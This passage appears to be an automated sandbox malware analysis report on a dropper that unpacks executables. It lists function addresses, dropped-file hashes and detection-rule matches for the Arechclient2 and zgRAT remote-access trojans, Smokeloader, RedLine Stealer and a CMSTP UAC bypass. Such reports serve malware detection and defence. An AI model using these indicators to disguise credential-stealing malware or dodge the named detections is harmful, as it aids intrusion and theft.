Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC5C9E0 1_2_6BC5C9E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB749F0 1_2_6BB749F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC009B0 1_2_6BC009B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB96900 1_2_6BB96900
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB78960 1_2_6BB78960
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC468E0 1_2_6BC468E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC14840 1_2_6BC14840
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB90820 1_2_6BB90820
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBCA820 1_2_6BBCA820
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB4EFB0 1_2_6BB4EFB0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC1EFF0 1_2_6BC1EFF0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB40FE0 1_2_6BB40FE0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC88FB0 1_2_6BC88FB0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB46F10 1_2_6BB46F10
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC02F70 1_2_6BC02F70
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC80F20 1_2_6BC80F20
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBAEF40 1_2_6BBAEF40
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBC6E90 1_2_6BBC6E90
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB4AEC0 1_2_6BB4AEC0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBE0EC0 1_2_6BBE0EC0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBDEE70 1_2_6BBDEE70
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC20E20 1_2_6BC20E20
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB44DB0 1_2_6BB44DB0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BCCCDC0 1_2_6BCCCDC0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBD6D90 1_2_6BBD6D90
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC6AD50 1_2_6BC6AD50
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC0ED70 1_2_6BC0ED70
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BCC8D20 1_2_6BCC8D20
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB9ECD0 1_2_6BB9ECD0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB3ECC0 1_2_6BB3ECC0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC06C00 1_2_6BC06C00
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB4AC60 1_2_6BB4AC60
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC1AC30 1_2_6BC1AC30
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB9E3B0 1_2_6BB9E3B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB723A0 1_2_6BB723A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB943E0 1_2_6BB943E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBB2320 1_2_6BBB2320
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC5C360 1_2_6BC5C360
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC82370 1_2_6BC82370
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB42370 1_2_6BB42370
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBD6370 1_2_6BBD6370
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB48340 1_2_6BB48340
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BCC62C0 1_2_6BCC62C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC122A0 1_2_6BC122A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC0E2B0 1_2_6BC0E2B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC0A210 1_2_6BC0A210
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBC8260 1_2_6BBC8260
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC18220 1_2_6BC18220
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBD8250 1_2_6BBD8250
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB401E0 1_2_6BB401E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBB6130 1_2_6BBB6130
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC24130 1_2_6BC24130
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBA8140 1_2_6BBA8140
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB500B0 1_2_6BB500B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB38090 1_2_6BB38090
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC1C0B0 1_2_6BC1C0B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC0C000 1_2_6BC0C000
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB8E070 1_2_6BB8E070
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC08010 1_2_6BC08010
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB6A7D0 1_2_6BB6A7D0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBC0700 1_2_6BBC0700
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB9E6E0 1_2_6BB9E6E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBDE6E0 1_2_6BBDE6E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB646D0 1_2_6BB646D0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB9C650 1_2_6BB9C650
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB345B0 1_2_6BB345B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC0A5E0 1_2_6BC0A5E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBCE5F0 1_2_6BBCE5F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC44540 1_2_6BC44540
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC88550 1_2_6BC88550
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBE0570 1_2_6BBE0570
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBA2560 1_2_6BBA2560
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB98540 1_2_6BB98540
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC6A480 1_2_6BC6A480
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB864D0 1_2_6BB864D0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBDA4D0 1_2_6BBDA4D0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBCA430 1_2_6BBCA430
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBA4420 1_2_6BBA4420
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB58460 1_2_6BB58460
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB99BA0 1_2_6BB99BA0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB31B80 1_2_6BB31B80
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BB87BF0 1_2_6BB87BF0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC25B90 1_2_6BC25B90
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BC09BB0 1_2_6BC09BB0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DAF840 2_2_00DAF840
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00D94060 2_2_00D94060
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DAB150 2_2_00DAB150
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DB6130 2_2_00DB6130
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00F1091C 2_2_00F1091C
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00D92120 2_2_00D92120
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DDCAA0 2_2_00DDCAA0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DE9A00 2_2_00DE9A00
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DA4390 2_2_00DA4390
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DB0390 2_2_00DB0390
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DBFC10 2_2_00DBFC10
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DE5550 2_2_00DE5550
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00D9D570 2_2_00D9D570
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00D9A6F0 2_2_00D9A6F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DB66F0 2_2_00DB66F0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DE96E0 2_2_00DE96E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00D937B0 2_2_00D937B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C894D8F 2_2_6C894D8F
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C893D16 2_2_6C893D16
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C8A371C 2_2_6C8A371C
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C80D24D 2_2_6C80D24D
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: String function: 6BCCDAE0 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: String function: 6BCCD930 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: String function: 6BB63620 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: String function: 6BB69B10 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: String function: 6BCC09D0 appears 229 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: String function: 00D91310 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: String function: 00F19D36 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: String function: 00D914F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: String function: 00D91900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: String function: 6C896320 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: String function: 00D91930 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: String function: 6C894701 appears 60 times
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: String function: 05BE9F27 appears 48 times
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: String function: 05C07A73 appears 43 times
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: String function: 0042780C appears 43 times
One or more processes crash
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 944
Sample file is different than original file name gathered from version info
Source: kO1P1YnLst.exe, 00000000.00000003.1792381093.0000000005E73000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000002.1986096149.00000000042F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFirezer0 vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1790523128.0000000005E5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000002.1985855543.0000000004048000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFirezer0 vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1790377394.0000000005E45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1794062629.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1790570193.0000000005E63000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000002.1986651920.0000000005E64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000002.1986651920.0000000005E64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameL vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1792292879.0000000005E4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1792420578.0000000005E58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795345147.0000000005E64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameL vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000002.1986431340.0000000005DEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameL vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000070CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \OriginalFileName vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1789195870.0000000005E45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1789248746.0000000005E62000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795228001.0000000005E63000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795010430.0000000005E45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795188664.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1792445000.0000000005E63000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1789371537.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1794624698.0000000005E45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1743343365.0000000005DF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFirezer0 vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1790394336.0000000005E4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1789226034.0000000005E4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1793507763.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1789284127.0000000005E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795126272.0000000005E52000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1794708530.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1790487700.0000000005E58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1795076695.0000000005E73000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe, 00000000.00000003.1790420213.0000000005E55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics.dllj% vs kO1P1YnLst.exe
Source: kO1P1YnLst.exe Binary or memory string: OriginalFilenameFirezer0 vs kO1P1YnLst.exe
Uses 32bit PE files
Source: kO1P1YnLst.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 18.2.MSBuild.exe.820000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 13.2.run.exe.37b586d.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.56c5264.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.60900c8.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 3.2.cmd.exe.56c5e64.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.57f9264.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.run.exe.450d86d.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.57f9e64.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 2.2.run.exe.4551d5b.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.run.exe.37f9d5b.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.57b5976.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.60900c8.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 13.2.run.exe.37f915b.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.5681976.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.5dd00c8.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 2.2.run.exe.455115b.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.2500065620.0000000004354000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1986065052.0000000004255000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Local\Temp\pasb, type: DROPPED Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\khjsru, type: DROPPED Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 3.2.cmd.exe.60900c8.8.raw.unpack, -Module-.cs Cryptographic APIs: 'CreateDecryptor'
